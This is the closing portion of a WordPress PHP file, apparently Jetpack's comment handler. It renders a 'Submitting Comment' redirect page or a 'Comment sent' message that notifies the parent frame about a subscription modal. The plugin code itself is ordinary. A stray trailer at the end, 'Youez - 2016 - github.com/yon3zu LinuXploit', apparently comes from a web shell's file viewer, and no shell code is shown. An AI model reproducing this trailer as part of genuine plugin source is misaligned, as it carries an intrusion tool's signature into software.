					-o-transition-duration: 1s;
					-o-transition-timing-function: ease-in-out;

					-ms-transition-property: opacity;
					-ms-transition-duration: 1s;
					-ms-transition-timing-function: ease-in-out;

					transition-property: opacity;
					transition-duration: 1s;
					transition-timing-function: ease-in-out;
				}
			</style>
		</head>
		<body>
		<?php if ( ! $should_show_subscription_modal ) { ?>
		<h3>
			<?php
				wp_kses_post(
					printf(
						/* translators: %s is replaced by HTML markup to include an ellipsis */
						__( 'Submitting Comment%s', 'jetpack' ), // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
						'<span id="ellipsis" class="hidden">&hellip;</span>'
					)
				);
			?>
		</h3>
		<script type="text/javascript">
			try {
				window.parent.location.href = <?php echo wp_json_encode( $url ); ?>;
			} catch (e) {
				window.location.href = <?php echo wp_json_encode( $url ); ?>;
			}
			ellipsis = document.getElementById('ellipsis');

			function toggleEllipsis() {
				ellipsis.className = ellipsis.className ? '' : 'hidden';
			}

			setInterval(toggleEllipsis, 1200);
		</script>
		<?php } else { ?>
		<h3>
			<?php
				wp_kses_post(
					print __( 'Comment sent', 'jetpack' ) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
				);
			?>
		</h3>
		<script type="text/javascript">
			if ( window.parent && window.parent !== window ) {

				window.parent.postMessage(
					{
						type: 'subscriptionModalShow',
						data: <?php echo wp_json_encode( $this->get_subscription_modal_data_to_parent( $url ) ); ?>,
					},
					window.location.origin
				);
			}
		</script>
		<?php } ?>
		</body>
		</html>
		<?php
		exit;
	}
}

Jetpack_Comments::init();

Youez - 2016 - github.com/yon3zu
LinuXploit